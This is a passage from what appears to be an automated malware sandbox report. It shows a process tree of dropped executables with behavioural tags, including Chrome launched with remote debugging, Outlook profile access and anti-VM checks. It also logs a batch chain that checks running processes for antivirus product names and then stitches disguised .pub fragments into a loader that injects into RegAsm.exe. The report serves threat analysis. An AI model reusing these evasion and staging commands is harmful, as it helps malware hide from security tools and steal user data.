                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                            6⤵
                                                            • Uses browser remote debugging
                                                            • Drops file in Windows directory
                                                            • Enumerates system info in registry
                                                            • Modifies data under HKEY_USERS
                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            • Suspicious use of FindShellTrayWindow
                                                            PID:1364
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xc,0x108,0x7ff9d4afcc40,0x7ff9d4afcc4c,0x7ff9d4afcc58
                                                              7⤵
                                                                PID:4608
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1956,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1952 /prefetch:2
                                                                7⤵
                                                                  PID:2964
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1792,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2064 /prefetch:3
                                                                  7⤵
                                                                    PID:5372
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2196 /prefetch:8
                                                                    7⤵
                                                                      PID:5396
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3112,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3184 /prefetch:1
                                                                      7⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4912
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3116,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3208 /prefetch:1
                                                                      7⤵
                                                                      • Uses browser remote debugging
                                                                      PID:4968
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4480,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4512 /prefetch:1
                                                                      7⤵
                                                                      • Uses browser remote debugging
                                                                      PID:3960
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=3108,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3580 /prefetch:8
                                                                      7⤵
                                                                        PID:1540
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4756,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4752 /prefetch:8
                                                                        7⤵
                                                                          PID:4888
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4908,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4632 /prefetch:8
                                                                          7⤵
                                                                            PID:3476
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4696,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4220 /prefetch:8
                                                                            7⤵
                                                                              PID:3128
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4632,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4708 /prefetch:8
                                                                              7⤵
                                                                                PID:2000
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4876,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5128 /prefetch:8
                                                                                7⤵
                                                                                  PID:1064
                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5040,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5268 /prefetch:8
                                                                                  7⤵
                                                                                    PID:2268
                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5144,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5132 /prefetch:8
                                                                                    7⤵
                                                                                      PID:5160
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5288,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5396 /prefetch:2
                                                                                      7⤵
                                                                                      • Uses browser remote debugging
                                                                                      PID:5776
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5344,i,16339045292139854741,16937382160672972581,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5296 /prefetch:8
                                                                                      7⤵
                                                                                        PID:5956
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2312 -s 788
                                                                                    5⤵
                                                                                    • Program crash
                                                                                    PID:3376
                                                                                • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
                                                                                  4⤵
                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                  • Checks BIOS information in registry
                                                                                  • Executes dropped EXE
                                                                                  • Identifies Wine through registry keys
                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:1676
                                                                                • C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
                                                                                  4⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:2020
                                                                                  • C:\Windows\TEMP\{D2EA70C1-D615-4465-BA28-4CCFF2EAA8EB}\.cr\z3SJkC5.exe
                                                                                    "C:\Windows\TEMP\{D2EA70C1-D615-4465-BA28-4CCFF2EAA8EB}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=684 -burn.filehandle.self=680
                                                                                    5⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2724
                                                                                    • C:\Windows\TEMP\{D97A10EA-0BC6-42DF-AED9-D47B0C76895C}\.ba\WiseTurbo.exe
                                                                                      C:\Windows\TEMP\{D97A10EA-0BC6-42DF-AED9-D47B0C76895C}\.ba\WiseTurbo.exe
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                      PID:1468
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\SysWOW64\cmd.exe
                                                                                        7⤵
                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                        PID:3548
                                                                                        • C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\WatcherUpdate_test.exe
                                                                                          8⤵
                                                                                          • Loads dropped DLL
                                                                                          • Accesses Microsoft Outlook profiles
                                                                                          • outlook_office_path
                                                                                          PID:4948
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default"
                                                                                            9⤵
                                                                                            • Enumerates system info in registry
                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                            • Suspicious use of SendNotifyMessage
                                                                                            PID:2492
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9e6813cb8,0x7ff9e6813cc8,0x7ff9e6813cd8
                                                                                              10⤵
                                                                                                PID:5292
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1936 /prefetch:2
                                                                                                10⤵
                                                                                                  PID:1708
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 /prefetch:3
                                                                                                  10⤵
                                                                                                    PID:2468
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
                                                                                                    10⤵
                                                                                                      PID:5612
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                      10⤵
                                                                                                        PID:828
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                        10⤵
                                                                                                          PID:1456
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4384 /prefetch:1
                                                                                                          10⤵
                                                                                                            PID:4580
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                                                                                            10⤵
                                                                                                              PID:6068
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:1
                                                                                                              10⤵
                                                                                                                PID:3696
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:1
                                                                                                                10⤵
                                                                                                                  PID:4356
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:8
                                                                                                                  10⤵
                                                                                                                    PID:5132
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5580 /prefetch:8
                                                                                                                    10⤵
                                                                                                                      PID:3476
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1948,6732103896642892603,10398669916260570127,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                                                                                                                      10⤵
                                                                                                                        PID:6020
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 752
                                                                                                                6⤵
                                                                                                                • Program crash
                                                                                                                PID:3600
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2724 -s 676
                                                                                                                6⤵
                                                                                                                • Program crash
                                                                                                                PID:3408
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
                                                                                                            4⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Identifies Wine through registry keys
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2176
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4496
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
                                                                                                            4⤵
                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Executes dropped EXE
                                                                                                            • Identifies Wine through registry keys
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:2672
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10111840101\HmngBpR.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                            PID:1408
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\Dockerprotectysd\SplashWin.exe
                                                                                                              5⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:3844
                                                                                                              • C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Dockerprotectysd\SplashWin.exe
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:4724
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  C:\Windows\SysWOW64\cmd.exe
                                                                                                                  7⤵
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:2080
                                                                                                                  • C:\Windows\SysWOW64\explorer.exe
                                                                                                                    C:\Windows\SysWOW64\explorer.exe
                                                                                                                    8⤵
                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:6000
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10112790101\ADFoyxP.exe"
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:2996
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat
                                                                                                              5⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:6040
                                                                                                              • C:\Windows\SysWOW64\expand.exe
                                                                                                                expand Go.pub Go.pub.bat
                                                                                                                6⤵
                                                                                                                  PID:4228
                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                  tasklist
                                                                                                                  6⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:1764
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr /I "opssvc wrsa"
                                                                                                                  6⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:4872
                                                                                                                • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                  tasklist
                                                                                                                  6⤵
                                                                                                                  • Enumerates processes with tasklist
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5940
                                                                                                                • C:\Windows\SysWOW64\findstr.exe
                                                                                                                  findstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"
                                                                                                                  6⤵
                                                                                                                    PID:4408
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c md 353090
                                                                                                                    6⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5848
                                                                                                                  • C:\Windows\SysWOW64\extrac32.exe
                                                                                                                    extrac32 /Y /E Really.pub
                                                                                                                    6⤵
                                                                                                                      PID:6060
                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                      findstr /V "posted" Good
                                                                                                                      6⤵
                                                                                                                        PID:1936
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com
                                                                                                                        6⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3576
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c copy /b ..\Maintains.pub + ..\Legislation.pub + ..\Blood.pub + ..\Document.pub + ..\Breaks.pub + ..\Both.pub + ..\Explicitly.pub + ..\Governor.pub + ..\Bull.pub + ..\Comparison.pub + ..\Performing.pub + ..\Gate.pub + ..\Republican.pub + ..\Reverse.pub + ..\Thousand.pub + ..\Apartments.pub + ..\Swingers.pub + ..\Urban.pub + ..\Robert.pub + ..\Regulation.pub + ..\Confusion.pub + ..\Listening.pub + ..\Generating.pub + ..\Argentina.pub + ..\Amenities.pub + ..\Vacation.pub + ..\Vampire.pub + ..\Trademarks.pub + ..\Distinguished.pub + ..\Silly.pub + ..\Hell.pub + ..\Worcester.pub + ..\Concept.pub + ..\Enlarge.pub + ..\Preference.pub + ..\Poem.pub m
                                                                                                                        6⤵
                                                                                                                          PID:3948
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\353090\Seat.com
                                                                                                                          Seat.com m
                                                                                                                          6⤵
                                                                                                                          • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                          PID:1568
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1636
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:4244
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4244 -s 1352
                                                                                                                              8⤵
                                                                                                                              • Program crash
                                                                                                                              PID:2608
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1072
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5576
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 1316
                                                                                                                              8⤵
                                                                                                                              • Program crash
                                                                                                                              PID:444
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\353090\RegAsm.exe
                                                                                                                            7⤵
                                                                                                                              PID:5252
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1308
                                                                                                                                8⤵
                                                                                                                                • Program crash
                                                                                                                                PID:2912
                                                                                                                          • C:\Windows\SysWOW64\choice.exe
                                                                                                                            choice /d y /t 5
                                                                                                                            6⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5184
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10114440101\9hUDDVk.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3192
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                                                                                                                        4⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:4188
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe"
                                                                                                                          5⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:6076
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10114630101\pwHxMTy.exe
